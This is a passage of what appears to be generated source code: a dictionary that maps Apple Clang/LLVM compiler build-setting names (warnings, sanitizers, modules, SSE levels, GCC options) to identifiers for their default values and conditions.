"com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue,
